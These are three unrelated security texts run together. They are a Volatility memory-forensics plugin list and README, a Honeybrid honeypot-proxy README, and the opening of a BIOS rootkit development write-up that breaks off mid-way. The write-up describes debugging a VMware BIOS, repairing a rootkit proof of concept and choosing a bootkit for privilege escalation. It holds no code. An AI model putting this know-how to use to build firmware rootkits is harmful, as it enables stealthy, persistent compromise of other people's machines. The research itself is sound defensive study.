Win2003SP0x86              - A Profile for Windows 2003 SP0 x86
Win2003SP1x64              - A Profile for Windows 2003 SP1 x64
Win2003SP1x86              - A Profile for Windows 2003 SP1 x86
Win2003SP2x64              - A Profile for Windows 2003 SP2 x64
Win2003SP2x86              - A Profile for Windows 2003 SP2 x86
Win2008R2SP0x64            - A Profile for Windows 2008 R2 SP0 x64
Win2008R2SP1x64            - A Profile for Windows 2008 R2 SP1 x64
Win2008SP1x64              - A Profile for Windows 2008 SP1 x64
Win2008SP1x86              - A Profile for Windows 2008 SP1 x86
Win2008SP2x64              - A Profile for Windows 2008 SP2 x64
Win2008SP2x86              - A Profile for Windows 2008 SP2 x86
Win2012R2x64               - A Profile for Windows Server 2012 R2 x64
Win2012x64                 - A Profile for Windows Server 2012 x64
Win7SP0x64                 - A Profile for Windows 7 SP0 x64
Win7SP0x86                 - A Profile for Windows 7 SP0 x86
Win7SP1x64                 - A Profile for Windows 7 SP1 x64
Win7SP1x86                 - A Profile for Windows 7 SP1 x86
Win8SP0x64                 - A Profile for Windows 8 x64
Win8SP0x86                 - A Profile for Windows 8 x86
Win8SP1x64                 - A Profile for Windows 8.1 x64
Win8SP1x86                 - A Profile for Windows 8.1 x86
WinXPSP1x64                - A Profile for Windows XP SP1 x64
WinXPSP2x64                - A Profile for Windows XP SP2 x64
WinXPSP2x86                - A Profile for Windows XP SP2 x86
WinXPSP3x86                - A Profile for Windows XP SP3 x86

Address Spaces
AMD64PagedMemory              - Standard AMD 64-bit address space.
ArmAddressSpace               - No docs        
FileAddressSpace              - This is a direct file AS.
HPAKAddressSpace              - This AS supports the HPAK format
IA32PagedMemory               - Standard IA-32 paging address space.
IA32PagedMemoryPae            - This class implements the IA-32 PAE paging address space. It is responsible
LimeAddressSpace              - Address space for Lime
MachOAddressSpace             - Address space for mach-o files to support atc-ny memory reader
OSXPmemELF                    - This AS supports VirtualBox ELF64 coredump format
QemuCoreDumpElf               - This AS supports Qemu ELF32 and ELF64 coredump format
VMWareAddressSpace            - This AS supports VMware snapshot (VMSS) and saved state (VMSS) files
VMWareMetaAddressSpace        - This AS supports the VMEM format with VMSN/VMSS metadata
VirtualBoxCoreDumpElf64       - This AS supports VirtualBox ELF64 coredump format
WindowsCrashDumpSpace32       - This AS supports windows Crash Dump format
WindowsCrashDumpSpace64       - This AS supports windows Crash Dump format
WindowsCrashDumpSpace64BitMap - This AS supports Windows BitMap Crash Dump format
WindowsHiberFileSpace32       - This is a hibernate address space for windows hibernation files.

apihooks                   - Detect API hooks in process and kernel memory
atoms                      - Print session and window station atom tables
atomscan                   - Pool scanner for atom tables
auditpol                   - Prints out the Audit Policies from HKLM\SECURITY\Policy\PolAdtEv
bigpools                   - Dump the big page pools using BigPagePoolScanner
bioskbd                    - Reads the keyboard buffer from Real Mode memory
cachedump                  - Dumps cached domain hashes from memory
callbacks                  - Print system-wide notification routines
clipboard                  - Extract the contents of the windows clipboard
cmdline                    - Display process command-line arguments
cmdscan                    - Extract command history by scanning for _COMMAND_HISTORY
connections                - Print list of open connections [Windows XP and 2003 Only]
connscan                   - Pool scanner for tcp connections
consoles                   - Extract command history by scanning for _CONSOLE_INFORMATION
crashinfo                  - Dump crash-dump information
deskscan                   - Poolscaner for tagDESKTOP (desktops)
devicetree                 - Show device tree
dlldump                    - Dump DLLs from a process address space
dlllist                    - Print list of loaded dlls for each process
driverirp                  - Driver IRP hook detection
driverscan                 - Pool scanner for driver objects
dumpcerts                  - Dump RSA private and public SSL keys
dumpfiles                  - Extract memory mapped and cached files
envars                     - Display process environment variables
eventhooks                 - Print details on windows event hooks
evtlogs                    - Extract Windows Event Logs (XP/2003 only)
filescan                   - Pool scanner for file objects
gahti                      - Dump the USER handle type information
gditimers                  - Print installed GDI timers and callbacks
gdt                        - Display Global Descriptor Table
getservicesids             - Get the names of services in the Registry and return Calculated SID
getsids                    - Print the SIDs owning each process
handles                    - Print list of open handles for each process
hashdump                   - Dumps passwords hashes (LM/NTLM) from memory
hibinfo                    - Dump hibernation file information
hivedump                   - Prints out a hive
hivelist                   - Print list of registry hives.
hivescan                   - Pool scanner for registry hives
hpakextract                - Extract physical memory from an HPAK file
hpakinfo                   - Info on an HPAK file
idt                        - Display Interrupt Descriptor Table
iehistory                  - Reconstruct Internet Explorer cache / history
imagecopy                  - Copies a physical address space out as a raw DD image
imageinfo                  - Identify information for the image
impscan                    - Scan for calls to imported functions
joblinks                   - Print process job link information
kdbgscan                   - Search for and dump potential KDBG values
kpcrscan                   - Search for and dump potential KPCR values
ldrmodules                 - Detect unlinked DLLs
limeinfo                   - Dump Lime file format information
linux_apihooks             - Checks for userland apihooks
linux_arp                  - Print the ARP table
linux_banner               - Prints the Linux banner information
linux_bash                 - Recover bash history from bash process memory
linux_bash_env             - Recover bash's environment variables
linux_bash_hash            - Recover bash hash table from bash process memory
linux_check_afinfo         - Verifies the operation function pointers of network protocols
linux_check_creds          - Checks if any processes are sharing credential structures
linux_check_evt_arm        - Checks the Exception Vector Table to look for syscall table hooking
linux_check_fop            - Check file operation structures for rootkit modifications
linux_check_idt            - Checks if the IDT has been altered
linux_check_inline_kernel  - Check for inline kernel hooks
linux_check_modules        - Compares module list to sysfs info, if available
linux_check_syscall        - Checks if the system call table has been altered
linux_check_syscall_arm    - Checks if the system call table has been altered
linux_check_tty            - Checks tty devices for hooks
linux_cpuinfo              - Prints info about each active processor
linux_dentry_cache         - Gather files from the dentry cache
linux_dmesg                - Gather dmesg buffer
linux_dump_map             - Writes selected memory mappings to disk
linux_elfs                 - Find ELF binaries in process mappings
linux_enumerate_files      - Lists files referenced by the filesystem cache
linux_find_file            - Lists and recovers files from memory
linux_hidden_modules       - Carves memory to find hidden kernel modules
linux_ifconfig             - Gathers active interfaces
linux_info_regs            - It's like 'info registers' in GDB. It prints out all the
linux_iomem                - Provides output similar to /proc/iomem
linux_kernel_opened_files  - Lists files that are opened from within the kernel
linux_keyboard_notifiers   - Parses the keyboard notifier call chain
linux_ldrmodules           - Compares the output of proc maps with the list of libraries from libdl
linux_library_list         - Lists libraries loaded into a process
linux_librarydump          - Dumps shared libraries in process memory to disk
linux_list_raw             - List applications with promiscuous sockets
linux_lsmod                - Gather loaded kernel modules
linux_lsof                 - Lists open files
linux_malfind              - Looks for suspicious process mappings
linux_memmap               - Dumps the memory map for linux tasks
linux_moddump              - Extract loaded kernel modules
linux_mount                - Gather mounted fs/devices
linux_mount_cache          - Gather mounted fs/devices from kmem_cache
linux_netfilter            - Lists Netfilter hooks
linux_netstat              - Lists open sockets
linux_pidhashtable         - Enumerates processes through the PID hash table
linux_pkt_queues           - Writes per-process packet queues out to disk
linux_plthook              - Scan ELF binaries' PLT for hooks to non-NEEDED images
linux_proc_maps            - Gathers process maps for linux
linux_proc_maps_rb         - Gathers process maps for linux through the mappings red-black tree
linux_procdump             - Dumps a process's executable image to disk
linux_process_hollow       - Checks for signs of process hollowing
linux_psaux                - Gathers processes along with full command line and start time
linux_psenv                - Gathers processes along with their environment
linux_pslist               - Gather active tasks by walking the task_struct->task list
linux_pslist_cache         - Gather tasks from the kmem_cache
linux_pstree               - Shows the parent/child relationship between processes
linux_psxview              - Find hidden processes with various process listings
linux_recover_filesystem   - Recovers the entire cached file system from memory
linux_route_cache          - Recovers the routing cache from memory
linux_sk_buff_cache        - Recovers packets from the sk_buff kmem_cache
linux_slabinfo             - Mimics /proc/slabinfo on a running machine
linux_strings              - Match physical offsets to virtual addresses (may take a while, VERY verbose)
linux_threads              - Prints threads of processes
linux_tmpfs                - Recovers tmpfs filesystems from memory
linux_truecrypt_passphrase - Recovers cached Truecrypt passphrases
linux_vma_cache            - Gather VMAs from the vm_area_struct cache
linux_volshell             - Shell in the memory image
linux_yarascan             - A shell in the Linux memory image
lsadump                    - Dump (decrypted) LSA secrets from the registry
mac_adium                  - Lists Adium messages
mac_apihooks               - Checks for API hooks in processes
mac_apihooks_kernel        - Checks to see if system call and kernel functions are hooked
mac_arp                    - Prints the arp table
mac_bash                   - Recover bash history from bash process memory
mac_bash_env               - Recover bash's environment variables
mac_bash_hash              - Recover bash hash table from bash process memory
mac_calendar               - Gets calendar events from
mac_check_mig_table        - Lists entires in the kernel's MIG table
mac_check_syscall_shadow   - Looks for shadow system call tables
mac_check_syscalls         - Checks to see if system call table entries are hooked
mac_check_sysctl           - Checks for unknown sysctl handlers
mac_check_trap_table       - Checks to see if mach trap table entries are hooked
mac_contacts               - Gets contact names from
mac_dead_procs             - Prints terminated/de-allocated processes
mac_dead_sockets           - Prints terminated/de-allocated network sockets
mac_dead_vnodes            - Lists freed vnode structures
mac_dmesg                  - Prints the kernel debug buffer
mac_dump_file              - Dumps a specified file
mac_dump_maps              - Dumps memory ranges of processes
mac_dyld_maps              - Gets memory maps of processes from dyld data structures
mac_find_aslr_shift        - Find the ASLR shift value for 10.8+ images
mac_ifconfig               - Lists network interface information for all devices
mac_ip_filters             - Reports any hooked IP filters
mac_keychaindump           - Recovers possbile keychain keys. Use chainbreaker to open related keychain files
mac_ldrmodules             - Compares the output of proc maps with the list of libraries from libdl
mac_librarydump            - Dumps the executable of a process
mac_list_files             - Lists files in the file cache
mac_list_sessions          - Enumerates sessions
mac_list_zones             - Prints active zones
mac_lsmod                  - Lists loaded kernel modules
mac_lsmod_iokit            - Lists loaded kernel modules through IOkit
mac_lsmod_kext_map         - Lists loaded kernel modules
mac_lsof                   - Lists per-process opened files
mac_machine_info           - Prints machine information about the sample
mac_malfind                - Looks for suspicious process mappings
mac_memdump                - Dump addressable memory pages to a file
mac_moddump                - Writes the specified kernel extension to disk
mac_mount                  - Prints mounted device information
mac_netstat                - Lists active per-process network connections
mac_network_conns          - Lists network connections from kernel network structures
mac_notesapp               - Finds contents of Notes messages
mac_notifiers              - Detects rootkits that add hooks into I/O Kit (e.g. LogKext)
mac_pgrp_hash_table        - Walks the process group hash table
mac_pid_hash_table         - Walks the pid hash table
mac_print_boot_cmdline     - Prints kernel boot arguments
mac_proc_maps              - Gets memory maps of processes
mac_procdump               - Dumps the executable of a process
mac_psaux                  - Prints processes with arguments in user land (**argv)
mac_pslist                 - List Running Processes
mac_pstree                 - Show parent/child relationship of processes
mac_psxview                - Find hidden processes with various process listings
mac_recover_filesystem     - Recover the cached filesystem
mac_route                  - Prints the routing table
mac_socket_filters         - Reports socket filters
mac_strings                - Match physical offsets to virtual addresses (may take a while, VERY verbose)
mac_tasks                  - List Active Tasks
mac_trustedbsd             - Lists malicious trustedbsd policies
mac_version                - Prints the Mac version
mac_volshell               - Shell in the memory image
mac_yarascan               - Scan memory for yara signatures
machoinfo                  - Dump Mach-O file format information
malfind                    - Find hidden and injected code
mbrparser                  - Scans for and parses potential Master Boot Records (MBRs)
memdump                    - Dump the addressable memory for a process
memmap                     - Print the memory map
messagehooks               - List desktop and thread window message hooks
mftparser                  - Scans for and parses potential MFT entries
moddump                    - Dump a kernel driver to an executable file sample
modscan                    - Pool scanner for kernel modules
modules                    - Print list of loaded modules
multiscan                  - Scan for various objects at once
mutantscan                 - Pool scanner for mutex objects
netscan                    - Scan a Vista (or later) image for connections and sockets
notepad                    - List currently displayed notepad text
objtypescan                - Scan for Windows object type objects
patcher                    - Patches memory based on page scans
poolpeek                   - Configurable pool scanner plugin
pooltracker                - Show a summary of pool tag usage
printkey                   - Print a registry key, and its subkeys and values
privs                      - Display process privileges
procdump                   - Dump a process to an executable file sample
pslist                     - Print all running processes by following the EPROCESS lists
psscan                     - Pool scanner for process objects
pstree                     - Print process list as a tree
psxview                    - Find hidden processes with various process listings
raw2dmp                    - Converts a physical memory sample to a windbg crash dump
screenshot                 - Save a pseudo-screenshot based on GDI windows
sessions                   - List details on _MM_SESSION_SPACE (user logon sessions)
shellbags                  - Prints ShellBags info
shimcache                  - Parses the Application Compatibility Shim Cache registry key
sockets                    - Print list of open sockets
sockscan                   - Pool scanner for tcp socket objects
ssdt                       - Display SSDT entries
strings                    - Match physical offsets to virtual addresses (may take a while, VERY verbose)
svcscan                    - Scan for Windows services
symlinkscan                - Pool scanner for symlink objects
thrdscan                   - Pool scanner for thread objects
threads                    - Investigate _ETHREAD and _KTHREADs
timeliner                  - Creates a timeline from various artifacts in memory
timers                     - Print kernel timers and associated module DPCs
truecryptmaster            - Recover TrueCrypt 7.1a Master Keys
truecryptpassphrase        - TrueCrypt Cached Passphrase Finder
truecryptsummary           - TrueCrypt Summary
unloadedmodules            - Print list of unloaded modules
userassist                 - Print userassist registry keys and information
userhandles                - Dump the USER handle tables
vaddump                    - Dumps out the vad sections to a file
vadinfo                    - Dump the VAD info
vadtree                    - Walk the VAD tree and display in tree format
vadwalk                    - Walk the VAD tree
vboxinfo                   - Dump virtualbox information
verinfo                    - Prints out the version information from PE images
vmwareinfo                 - Dump VMware VMSS/VMSN information
volshell                   - Shell in the memory image
windows                    - Print Desktop Windows (verbose details)
wintree                    - Print Z-Order Desktop Windows Tree
wndscan                    - Pool scanner for window stations
yarascan                   - Scan process or kernel memory with Yara signatures

3. To get more information on a Windows memory sample and to make sure Volatility
   supports that sample type, run 'python imageinfo -f <imagename>' or 'python kdbgscan -f <imagename>'

    $ python imageinfo -f WIN-II7VOJTUNGL-20120324-193051.raw 
    Volatility Foundation Volatility Framework 2.4
    Determining profile based on KDBG search...
              Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64 (Instantiated with Win7SP0x64)
                         AS Layer1 : AMD64PagedMemory (Kernel AS)
                         AS Layer2 : FileAddressSpace (/Path/to/WIN-II7VOJTUNGL-20120324-193051.raw)
                          PAE type : PAE
                               DTB : 0x187000L
                              KDBG : 0xf800016460a0
              Number of Processors : 1
         Image Type (Service Pack) : 1
                    KPCR for CPU 0 : 0xfffff80001647d00L
                 KUSER_SHARED_DATA : 0xfffff78000000000L
               Image date and time : 2012-03-24 19:30:53 UTC+0000
         Image local date and time : 2012-03-25 03:30:53 +0800

4. Run some other plugins. -f is a required option for all plugins. Some
   also require/accept other options. Run "python <plugin> -h" for
   more information on a particular command.  A Command Reference wiki
   is also available on the Google Code site:

   as well as Basic Usage:

Licensing and Copyright

Copyright (C) 2007-2014 Volatility Foundation

All Rights Reserved

Volatility is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

Volatility is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with Volatility.  If not, see <>.

Bugs and Support
There is no support provided with Volatility. There is NO

If you think you've found a bug, please report it at:

In order to help us solve your issues as quickly as possible,
please include the following information when filing a bug:

* The version of volatility you're using
* The operating system used to run volatility
* The version of python used to run volatility
* The suspected operating system of the memory image
* The complete command line you used to run volatility

Depending on the operating system of the memory image, you may need to provide
additional information, such as:

For Windows:
* The suspected Service Pack of the memory image

For Linux:
* The suspected kernel version of the memory image

Other options for communicaton can be found at:

Missing or Truncated Information
Volatility Foundation makes no claims about the validity or correctness of the
output of Volatility. Many factors may contribute to the
incorrectness of output from Volatility including, but not
limited to, malicious modifications to the operating system,
incomplete information due to swapping, and information corruption on
image acquisition. 

Command Reference 
The following url contains a reference of all commands supported by 

More Information can be found on: and on

Honeybrid – a intelligent network proxy that stands in front of a farm of honeypots

Honeybrid is a intelligent network proxy that stands in front of a farm of honeypots and redirect connections from low interaction to high interaction honeypots.

Welcome to honeybrid.

honeybrid is free software. Please see the file COPYING for details.
For documentation, please see the files in the doc subdirectory.
For building and installation instructions please see the INSTALL file.

This readme file contains the following sections:
 QUICK INSTALL  to dive in right away
 OVERVIEW:      to understand what honeybrid can do
 EXAMPLE:       to illustrate how to deploy honeybrid
 DEPENDENCIES:  to list software and libraries required to build and use honeybrid
 SCRIPT AND CONFIGURATION FILE: to explain starting script and default configuration file
 DOCUMENTATION: where to find documentation for honeybrid
 CONTACT:     who to contact for help or bug report
 DEVELOPMENT:     to explain how to add a new module to honeybrid


 sudo make install
 sudo mkdir /etc/honeybrid
 sudo mkdir /var/log/honeybrid
 sudo cp honeybrid.conf /etc/honeybrid/
 sudo cp /etc/init.d/

Then edit /etc/honeybrid/honeybrid.conf to suit your needs, and start honeybrid with the command:
 sudo /etc/init.d/ start

You can then bind honeybrid to your network and honeypots IP addresses with the command:
 sudo /etc/init.d/ add <lih_ip> <lih_mac> <hih_ip> <ext_if> <int_if>
 lih_ip  = Low interaction honeypot IP address
 lih_mac = Low interaction honeypot MAC addess
 hih_ip  = High interaction honeypot IP
 ext_if  = External interface (where Internet traffic will be received)
 int_if  = Internal interface (where honeynet traffic will be received)


Thank you for your interest in honeybrid!
The goals of honeybrid are:
 1) to facilitate the deployment and administration of large honeynet
 2) to combine low and high interaction honeypot to provide a highly scalable honeypot framework.
The second goal is achieved through a redirection mechanism that can transparently change the 
destination of a network session (TCP or UDP). Thus, uninteresting traffic can be handled by a 
front-end of low interaction honeypots or discarded right away, while interesting attacks can be 
forwarded to a back-end of high interaction honeypots for further analysis.

Honeybrid is a program that runs on a gateway between the farm of honeypots and the Internet.
Honeybrid has two main components:
 - a Decision Engine that analyzes incoming packets from Internet and that decide which connection should
   be accepted and potentially redirected, as well as when the redirection should occur,
 - a Redirection Engine that handles the network session to change dynamically and transparently the 
   destination IP.

For more information about how to install and use honeybrid, please refer to the detailed documentation
available in the ./doc folder or online on


Netfilter's functions are used to redirect traffic to honeybrid. It is important to correctly add
the queueing rules using iptables for honeybrid to receive the traffic it needs.
For example, in an architecture like:
     __________                ___________                 / Low Int. Honeypot \ 
    /          \              / honeybrid \       ,-----> |       |
    | attacker  |<----------> |eth0   eth1| <-----|        \___________________/
    \__________/              \___________/       |         ___________________
                                                  |        / High Int. Honeypot\
                                                  `-----> |       |

The following rules will queue the traffic from the attacker to the low int. honeypot (honeyd) and from honeyd to the attacker, as well
as from the high interaction honeypot to honeybrid:
 iptables -A FORWARD -p tcp -i eth1 -s -j QUEUE -m comment --comment 'honeybrid: packets from honeyd (LIH)'
 iptables -A FORWARD -p tcp -i eth0 -d -j QUEUE -m comment --comment 'honeybrid: packets to honeyd (LIH)'
 iptables -A FORWARD -p tcp -i eth1 -s -j QUEUE -m comment --comment 'honeybrid: packets from honeypot (HIH)'

Don't forget to active the routing mode:
 echo 1 > /proc/sys/net/ipv4/ip_forward


Honeybrid is dependent on the following public domain packages:
    libnetfilter-conntrack1    (must be >= version 0.0.50-1)
    libglib2.0-0 (must be >= 2.14 to have support for regexp)

For Debian Lenny, running the following command will take care of all the dependencies:
    % sudo apt-get install make binutils gcc libnetfilter-conntrack-dev libnetfilter-conntrack1 libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0 pkg-config libc6-dev libglib2.0-0 libglib2.0-dev linux-libc-dev libpcap0.8-dev libpcap0.8 openssl libssl-dev libev-dev libdumpnet-dev


   * honeybrid.conf
    honeybrid will not run without a configuration file, given in argument after the flag "-c".
    It is recommended to edit this file and then copy it into "/etc/honeybrid/honeybrid.conf"
    Include all parameters for honeybrid as well as definition of 
    detection modules and honeynet targets.

    The Start/Stop script
    Should be installed in "/etc/init.d/"
    Also includes "add" and "del" option to automatically add IP addresses
    to the iptables queue


Documentation for honeybrid is available:
 - online on
 - in the README and INSTALL files
 - in the folder "doc" is the developer documentation generated using doxygen
 - in the comments of the default configuration files


Send problems, bug reports, questions and comments to


Adding a new module in five steps -- Example with the module RANDOM:
 1. Create a file: mod_random.c, in which you can put the following functions:
    - int  init_mod_random()     [** this is optional, only if you need some initialization **]
    - void mod_random(struct mod_args args)
    mod_random.c must also have the following includes:
    #include "tables.h"
    #include "modules.h"
    #include "netcode.h"
 2. Modify the Makefile to:
    - add mod_random.c to the target SRC
    - add the target "mod_random.o: log.h tables.h modules.h types.h"
 3. Add the following function declarations in modules.h:
    int init_mod_random();        [** this is optional, only if you need some initialization **]
    void mod_random(struct mod_args args);
 4. Add the following call in the function init_modules() in modules.c:
    init_mod_random();        [** this is optional, only if you need some initialization **]
 5. Add the following condition in the function get_module() in modules.c:
    else if(!strncmp(modname,"random",6))
                return mod_random;

Now that you completed these five steps, your module is defined and hooked to
the system. The last task is to get it do something! For this you just have
to fill the function mod_random() with instructions.
The args structure given in argument of mod_random() has two main variables:
 - args.pkt is a struct_pkt where you can extract args.pkt->conn to have
   access to the connection structure
 - args.node has two interesting variables: 
    args.node->arg is the argument configured for this module and this
     connection in the rules of honeybrid
    args.node->result is an integer that must be updated at the end of
     the processing in mod_random(), either with 0 (discard) or 1 (replay)

To illustrate how everything works together, here is the content of mod_random():
  void mod_random(struct mod_args args)
    g_printerr("%s Module called\n", H(args.pkt->conn->id));

        unsigned int value = 0;
        unsigned int proba;
        int selector = 1;
        gchar *param;

        /*! getting the value provided as parameter */
        if (    (param = (char *)g_hash_table_lookup(args.node->arg, "value")) == NULL ) {
                /*! We can't decide */
                args.node->result = -1;
                g_printerr("%s Incorrect value parameter: %d\n", H(args.pkt->conn->id), value);
        } else {
                value = atoi(param);

        if (value < selector) {
                /*! We can't decide */
                args.node->result = -1;
                g_printerr("%s Incorrect value parameter: %d\n", H(args.pkt->conn->id), value);

        /*! deciding based on a probability of 1 out of "value": */
        proba = (int) (((double)value) * (rand() / (RAND_MAX + 1.0)));

        if (proba == selector) {
                /*! We accept this packet */
                args.node->result = 1;
                g_printerr("%s PACKET MATCH RULE for random(%d)\n", H(args.pkt->conn->id), value);
        } else {
                /*! We reject this packet */
                args.node->result = 0;
                g_printerr("%s PACKET DOES NOT MATCH RULE for random(%d)\n", H(args.pkt->conn->id), value);

We can see from the code that mod_random() uses the argument "value". This means that when defining this 
module in the configuration of honeybrid, user should write the value parameter. Here is an example:
 module "myrandom" {
        function = random;
        value = 20;

Another interesting parameter that can be defined is "backup". It is used by more complex modules that need
to save results to an external file periodically (and that can load previously recorded results when honeybrid
Here is an example of module definition for the "hash" module that uses such backup functionality:
 module "myhash" {
        function = hash;
        backup = /etc/honeybrid/hash.tb;

When using the backup parameter, the following function should be called at the end of the module processing 
 save_backup(backup, backup_file);

Where backup is retrived through the "backup" parameter (it's a pointer to a GKeyFile), and backup_file is 
a string to give the path and filename of the external file where results should be saved. Here is an excerpt
from the source code of mod_hash.c that shows how to retrieve these two parameters:
        /*! get the backup file for this module */
        if ( NULL ==    (backup = (GKeyFile *)g_hash_table_lookup(args.node->arg, "backup"))) {
                /*! We can't decide */
                args.node->result = -1;
                g_printerr("%s mandatory argument 'backup' undefined!\n", H(args.pkt->conn->id));
        /*! get the backup file path for this module */
        if ( NULL ==    (backup_file = (gchar *)g_hash_table_lookup(args.node->arg, "backup_file"))) {
                /*! We can't decide */
                args.node->result = -1;
                g_printerr("%s error, backup file path missing\n", H(args.pkt->conn->id));

More information can be found on: and on

BIOS Based Rootkits

BIOS Based Rootkits

This reasearch is published for purely educational purposes and it is a work of [ and not CyberPunk in any way ]. Many TnX and all the credit goes to them. Please take your time and visit their page and support the researchers. Make sure you check it out


Currently there is a very limited amount of sample code available for the creation of BIOS rootkits, with the only publicly available code being released along with the initial BIOS rootkit demonstration in March of 2009 (as far as I’m aware). My first goal was to reproduce the findings made by Core Security in 2009, and then my second task was to investigate how I could extend their findings. My ultimate goal was to create some sort of BIOS based rootkit which could easily be deployed.

In 2009 there was research done into a similar area of security, which is boot sector based rootkits. Unlike BIOS based rootkits, developments in this area have progressed rapidly, which has led to a number of different master boot record (MBR) based rootkits being developed and released. This type of rootkit was termed a “Bootkit”, and similar to a BIOS based rootkit it aims to load itself before the OS is loaded. This similarity led a number of bootkit developers to remark that it should be possible to perform this type of attack directly from the BIOS instead of loading from the MBR. Despite the comments and suggestions that this bootkit code could be moved into the BIOS for execution, there has not yet been any examples of such code made public.

The first stage for completing this project was to set up a test and development environment where BIOS modifications could be made and debugged. In their paper on Persistent BIOS Infection, Sacco and Ortega detail how they discovered that VMware contains a BIOS rom as well as a GDB server which can be used for debugging applications starting from the BIOS itself. After getting everything going successfully in VMware, work was done to port the VMware BIOS modifications to other similar BIOS’s, and will be described in the second half of this write-up.

VMware BIOS Configuration

Ok, enough background, onto the actually doing it!

The first step which is required is to extract the BIOS from VMware itself. In Windows, this can be done by opening the vmware-vmx.exe executable with any resource extractor, such as Resource Hacker. There are a number of different binary resources bundled into this application, and the BIOS is stored in resource ID 6006 (at least in VMware 7). In other versions this may be different, but the key thing to look for is the resource file that is 512kb in size. The following image shows what this looks like in Resource Hacker:


While this BIOS image is bundled into the vmware-vmx.exe application, it is also possible to use it separately, without the need to modify into the vmware executable after each change. VMware allows for a number of “hidden” options to be specified in an image’s VMX settings file. At some point I plan to document a bunch of them on the Tools page of this website, because some really are quite useful! The ones which are useful for BIOS modifications and debugging are the following:

bios440.filename = "BIOS.ROM"
debugStub.listen.guest32 = "TRUE"
debugStub.hideBreakpoint = "TRUE"
monitor.debugOnStartGuest32 = "TRUE"

The first setting allows for the BIOS rom to be loaded from a file instead of the vmware-vmx application directly. The following two lines enable the built in GDB server. This server listens for connections on port 8832 whenever the image is running. The last line instructs VMware to halt code execution at the first line of the guest image’s BIOS. This is very useful as it allows breakpoints to be defined and memory to be examined before any BIOS execution takes place. Testing was done using IDA Pro as the GDB client, and an example of the VMware guest image halted at the first BIOS instruction can be seen in the screenshot below:


When initially using this test environment, there were significant issues with IDA’s connection to the GDB server. After much trial and error and testing with different GDB clients, it was determined that the version of VMware was to blame. Version 6 and 6.5 do not appear to work very well with IDA, so version VMware version 7 was used for the majority of the testing. The BIOS is comprised of 16 bit code, and not the 32 bit code that IDA defaults to, so defining “Manual Memory Regions” in the debugging options of IDA was necessary. This allowed memory addresses to be defined as 16 bit code so that they would decompile properly.

Recreating Past Results – VMware BIOS Modification

As noted already, Sacco & Ortega have done two presentations on BIOS modification, and Wojtczuk & Tereshkin have also done a presentation regarding BIOS modification. Of these three presentations, only Sacco & Ortega included any source or sample code which demonstrated their described techniques. Since this was the only existing example available, it was used as the starting point for this BIOS based rootkits project.

The paper by Sacco & Ortega is fairly comprehensive in describing their set up and testing techniques. The VMware setup was completed as described above, and the next step was to implement the BIOS modification code which they had provided. The code provided required the BIOS rom to be extracted into individual modules. The BIOS rom included with VMware is a Phoenix BIOS. Research showed that there were two main tools for working with this type of BIOS, an open source tool called “phxdeco”, and a commercial tool called “Phoenix BIOS Editor”, which is provided directly by Phoenix. The paper by Sacco & Ortega recommended the use of the Phoenix BIOS Editor application and they had designed their code to make use of it. A trial version was downloaded from the internet and it appears to have all of the functionality necessary for this project. Looking for a download link again I can’t find anything that seems even half legitimate, but Google does come up with all kinds of links. I’ll just assume that it should be fairly easy to track down some sort of legitimate trial version still. Once the tools are installed, the next step is to build a custom BIOS.

I first tested that a minor modification to the BIOS image would take effect in VMware, which it did (changed the VMware logo colour). Next, I ran the Python build script provided by Sacco & Ortega for the BIOS modification. Aside from one typo in the Python BIOS assembly script everything worked great and a new BIOS was saved to disk. Loading this BIOS in VMware however did not result in the same level of success, with VMware displaying a message that something had gone horribly wrong in the virtual machine and it was being shut down. Debugging of this issue was done in IDA and GDB, but the problem was difficult to trace (plus there were version issues with IDA). In an effort to get things working quickly, a different version of VMware was loaded, so that the test environment would match that of Sacco & Ortega’s. After some searching, the exact version of VMware that they had used was located and installed. This unfortunately still did not solve the issue, the same crash error was reported by VMware. While I had seen this BIOS modification work when demonstrated as part of their presentation, it was now clear that their example code would require additional modification before it could work on any test system.

Many different things were learned as a result of debugging Sacco’s & Ortega’s code, and eventually the problem was narrowed down to an assembler instruction which was executing a far call to an absolute address which was not the correct address for the BIOS being used. With the correct address entered the BIOS code successfully executed, and the rootkit began searching the hard drive for files to modify. This code took a very long time to scan across the hard drive (which was only 15gb), and it was run multiple times before the system would start. The proof of concept code included the functionality to patch notepad.exe so that it would display a message when started, or to modify the /etc/passwd file on a unix system so that the root password would be set to a fixed value. This showed that the rootkits can be functional on both Windows and Linux systems, even if only used for simple purposes.

Bootkit Testing

While significantly later on in the project time line, the functionality of various bootkit code was also tested, and the results recreated to determine which would work best as not just a bootkit, but also a BIOS based rootkit. Four different bootkits were examined, the Stoned, Whistler, Vbootkit and Vbootkit2 bootkits. The Stoned and Whistler bootkits were designed to function much more like malware than a rootkit, and did not have a simple source code structure. The Vbootkit2 bootkit was much different, as it was not designed to be malware and had (relatively) well documented source code. This bootkit was designed to be run from a CD, but only was tested with Windows 7 beta. When used with Windows 7 retail, the bootkit simply did not load as different file signatures were used by Windows. Some time was spent determining the new file signatures so that this bootkit could be tested, but it would still not load successfully. To allow for testing a beta copy of Windows 7 was obtained instead. When the Vbootkit2 software was run on a Windows 7 beta system, everything worked as expected. The Vbootkit2 software included the ability to escalate a process to System (above admin) level privileges, to capture keystrokes, and to reset user passwords. These were all items that would be valuable to have included in a rootkit, but significant work remained to port this application to Windows 7 retail. The Vbootkit software was examined next; it was designed to work with Windows 2003, XP and 2000. While it was not packaged so that it could be run from CD, only minor modifications were required to add that functionality. This software only included the ability to escalate process privileges, but that alone is a very valuable function. This bootkit software was chosen for use with the BIOS rootkit, which is described in the next section. NVLabs ( are the authors of the bootkit itself, which in many ways represents the main functionality of this project, so a big thanks to them for making their code public! It appears their source code is no longer available on their website, but it can still be downloaded from here.

BIOS Code Injection

The proof of concept code by Sacco & Ortega which was previously tested was very fragile, and its functions were not the type of actions that a rootkit should be performing. The first step in developing a new rootkit was to develop a robust method of having the BIOS execute additional code.

